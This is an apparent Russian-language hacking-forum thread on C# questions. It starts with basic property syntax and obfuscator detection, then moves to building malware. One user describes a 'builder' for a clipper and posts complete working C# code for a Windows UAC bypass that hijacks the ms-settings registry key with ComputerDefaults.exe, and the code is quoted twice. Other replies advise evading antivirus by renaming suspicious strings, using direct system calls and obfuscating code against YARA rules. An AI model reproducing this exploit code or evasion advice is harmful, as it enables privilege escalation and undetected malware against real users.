• XSS.stack #1 – первый литературный журнал от юзеров форума

Вопросы по С#

Ingiborga

(L3) cache
Забанен
Реакции
43
Пожалуйста, обратите внимание, что пользователь заблокирован
Я вроде изучаю тихо C# и все понятно, но вот гуглил, смотрел видосы и все равно не понимаю что такое { get; set; } може кто то найдется кто расскажет мне понятным мне языком. Понял только что можно обьявить ими доступ в приват класы или не так понял?

Я вроде изучаю тихо C#
Тогда почему спрашиваешь в теме по С++ и С?

{ get; set; } може кто то найдется кто расскажет мне понятным мне языком
Это геттер и сеттер, позволяет назначить произвольный метод, который будет вызываться при установке (сеттер) или получения (геттер) значения свойства. { get; set; } означает геттер и сеттер по-умолчанию, { get; } будет означать, что извне класса свойство можно только получить, но не установить и тд. Почитай любой учебник по С# в разделе свойств (properties).

всем привет. появилась необходимость клонировать окно виндоус формс, что бы оно существовало отдельно от оригинала с измененными данными в ячейках. после декомпиляции экзешника оказалось, что он заобфусцирован. пожалуйста, подскажите как узнать обфускатор? или какие есть другие способы сделать копию дизайна формы иными словами клонировать окноб но со своими данными

пожалуйста, подскажите как узнать обфускатор?
De4dot умеет определять некоторые обфускаторы.

Последнее редактирование:
как узнать обфускатор?
1 - PiD Team's Protection ID
2 - DNiD
3 - RDG Packer Detector
4 - DIE
Вот здесь можешь посмотреть разные анализаторы
или какие есть другие способы сделать копию дизайна формы иными словами клонировать окноб но со своими данными
Ну, после того как ты декомпилируешь приложение, его нужно будет править чтобы окошечко WindowsForms стало видимым.
Ты можешь просто нарисовать похожее ( если умеешь )

Последнее редактирование:
Не пробовал это - https://github.com/de4dot/de4dot ???
всем привет. появилась необходимость клонировать окно виндоус формс, что бы оно существовало отдельно от оригинала с измененными данными в ячейках. после декомпиляции экзешника оказалось, что он заобфусцирован. пожалуйста, подскажите как узнать обфускатор? или какие есть другие способы сделать копию дизайна формы иными словами клонировать окноб но со своими данными

Пишу билдер, нужно взять из TextBox все строки что там есть и добавить их в exe в массив:
C#:
public static string[] str = new string[]

{

"%SAIT1.RU%",

"%SAIT2.RU%",

"%SAIT3.RU%",

"%SAIT4.RU%",

};
Просто взять стриг и поменять его не проблема используя dnlib method.Body.Instructions.Operand = "SAIT1.RU";
А как быть в моем случае? Создавать кучу TextBox не вариант в билдере. Строк может быть 1000 и более

Разбивать строки в конечном exe вида "\nSAIT1.RU\nSAIT2.RU" то же не вариант
Хочу именно переменную впихать в exe с массивом строк.

Хочу именно переменную впихать в exe с массивом строк.
Насколько я помню, в MSIL нет "литерала" для константного массива. Нужно будет сделать статический конструктор, проинициализировать массив специальным опкодом (что-то типа NewArr, или как-то так он назывался), а потом заполнить его по одному элементу (сгенерировать опкоды LdStr, Stelem и тд, названия опкодов может напутал). Мне кажется, что это - бессмысленная дрочь в твоем случае, лучше сделай так:
Разбивать строки в конечном exe вида "\nSAIT1.RU\nSAIT2.RU" то же не вариант

Насколько я помню, в MSIL нет "литерала" для константного массива. Нужно будет сделать статический конструктор, проинициализировать массив специальным опкодом (что-то типа NewArr, или как-то так он назывался), а потом заполнить его по одному элементу (сгенерировать опкоды LdStr, Stelem и тд, названия опкодов может напутал). Мне кажется, что это - бессмысленная дрочь в твоем случае, лучше сделай так:
Действительно дроч). Разбил в конечном так работает:
C#:
public static string[] urklist = urlSTR.Split(new[] { Environment.NewLine }, StringSplitOptions.None);
Прост лишнего кода не хотел ну лан.

Так вышло да же лучше, не подумал раньше за то теперь можно 1 строку шифрануть и все и получается кода меньше:D

Может кто видел бесплатно или поделитесь UACBypass получше этого:

C#:
 public static void Run()
        {
            if (Registry.CurrentUser.OpenSubKey(@"Software\Classes\ms-settings\shell\open\command") == null)
                ElevateMe();
            else
                Registry.CurrentUser.DeleteSubKey(@"Software\Classes\ms-settings\shell\open\command");
            if (!IsElevated())
                Environment.Exit(0);
        }
        private static bool IsElevated()
        {
            using (WindowsIdentity identity = WindowsIdentity.GetCurrent())
            {
                WindowsPrincipal principal = new WindowsPrincipal(identity);
                return principal.IsInRole(WindowsBuiltInRole.Administrator);
            }
        }
        private static void ElevateMe()
        {
            try
            {
                CreateKey(string.Empty, Assembly.GetEntryAssembly().Location);
                CreateKey("DelegateExecute", string.Empty);
                Process.Start(@"C:\Windows\System32\ComputerDefaults.exe");
                Environment.Exit(0);
            }
            catch { }
            void CreateKey(string name, string val)
            {
                RegistryKey key = Registry.CurrentUser.CreateSubKey(@"Software\Classes\ms-settings\shell\open\command");
                key.SetValue(name, val);
                key.Close();
            }
        }

Это паблик с гитхаба чуток переделанный.
Не везде срабатывает.

Может кто видел бесплатно или поделитесь UACBypass получше этого:

C#:
 public static void Run()
        {
            if (Registry.CurrentUser.OpenSubKey(@"Software\Classes\ms-settings\shell\open\command") == null)
                ElevateMe();
            else
                Registry.CurrentUser.DeleteSubKey(@"Software\Classes\ms-settings\shell\open\command");
            if (!IsElevated())
                Environment.Exit(0);
        }
        private static bool IsElevated()
        {
            using (WindowsIdentity identity = WindowsIdentity.GetCurrent())
            {
                WindowsPrincipal principal = new WindowsPrincipal(identity);
                return principal.IsInRole(WindowsBuiltInRole.Administrator);
            }
        }
        private static void ElevateMe()
        {
            try
            {
                CreateKey(string.Empty, Assembly.GetEntryAssembly().Location);
                CreateKey("DelegateExecute", string.Empty);
                Process.Start(@"C:\Windows\System32\ComputerDefaults.exe");
                Environment.Exit(0);
            }
            catch { }
            void CreateKey(string name, string val)
            {
                RegistryKey key = Registry.CurrentUser.CreateSubKey(@"Software\Classes\ms-settings\shell\open\command");
                key.SetValue(name, val);
                key.Close();
            }
        }

Это паблик с гитхаба чуток переделанный.
Не везде срабатывает.
Старайся заменять слова Payload, Viru, Hack, Fuck, Suck,Shellcode и прочие. Для замены функций (strings, по которым тебя потом оценивает любой ав на direct system calls используй syswhipers). И да. в коде есть ошибка. Поищи на StacksOverflow. там естьб полнвя версия этой реликвии. Вон бабушка рядом, говорит помню - гавно)

Старайся заменять слова Payload, Viru, Hack, Fuck, Suck,Shellcode и прочие. Для замены функций (strings, по которым тебя потом оценивает любой ав на direct system calls используй syswhipers). И да. в коде есть ошибка. Поищи на StacksOverflow. там естьб полнвя версия этой реликвии. Вон бабушка рядом, говорит помню - гавно)
Все заренеймит обфускатор в любом случае. А по факту мне моя бабушка и посоветовала :D Вот я и ищу че посвежее.

Пишу чисто в образовательных целях билдер с клиппером типо мультитула. Как доделаю выложу на xss.
Будет не плохо если кто что посоветует. Заранее спасибо.
Скриншот 13-05-2021 232854.jpg

Все заренеймит обфускатор в любом случае. А по факту мне моя бабушка и посоветовала :D Вот я и ищу че посвежее.
Хм =) иди эмпирическим путем: возьми, не поленись два больших кс, в одном попробуй стереть комментарии и заменить, хотя бы при помощи того же сублиме, vars и classes и strings и тп. во втором - используй обфускатор. чекни. слежующий шаг - используй обфускатор на вручную отредактированном файле. чекай. =) и не гони - мазоли на пальцах и растительность на тыльной стороне ладоней - миф =)

Хм =) иди эмпирическим путем: возьми, не поленись два больших кс, в одном попробуй стереть комментарии и заменить, хотя бы при помощи того же сублиме, vars и classes и strings и тп. во втором - используй обфускатор. чекни. слежующий шаг - используй обфускатор на вручную отредактированном файле. чекай. =) и не гони - мазоли на пальцах и растительность на тыльной стороне ладоней - миф =)
Да лан...ты хочешь сказать комменты в виде //епана < компилятся в VS 2019 например? Или как АВ снимут рандом обфускацию? это же пздц...

Да лан...ты хочешь сказать комменты в виде //епана < компилятся в VS 2019 например? Или как АВ снимут рандом обфускацию? это же пздц...
Ничего не хочу сказать. Я просто предложил проверить, только и всего. Потом ты лучше скажешь. Идет?) Как снимут - очень просто. Подобные методы или способ ПРЯМО СЕЙЧАС юзает 20-100 человек. из них 1-2 попадают на расширенный тест. Далее: смотришь в окно -> 2021 год -> ИИ в самом разгаре... уже как лет 6... -> как только ты произнесешь слово - "ПИЗДЕЖЬ какой-то" - YARA rule уже в Яра-базе - > вывод: работа руками = результат. вывод два: голова не только чтобы туда кушать ))))

Ничего не хочу сказать. Я просто предложил проверить, только и всего. Потом ты лучше скажешь. Идет?)
Ну одно дело менять структуру то да, детект будет разный сильно. А просто ренеймить хоть рандомно обфускатором хоть в ручную, какая разница? Не вижу смысла.

Ну одно дело менять структуру то да, детект будет разный сильно. А просто ренеймить хоть рандомно обфускатором хоть в ручную, какая разница? Не вижу смысла.
Оке. Каждый ... думает ))) как хочет =) Но даже не это главное) будет время и интерес - естественно проверишь. напиши в пм потои. мб я реально гоню, изобретая велосипеды) а структура, как раз - пянятие системная (в отличии от того, что я упомянул). Как бы ты ее не менял, открою тебе секрет небольшой +)))) знаки, типа = ; , . @ # и остальные - не заменить ничем. И даже нигде, прикинь? Догадываешься о чем я?)

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх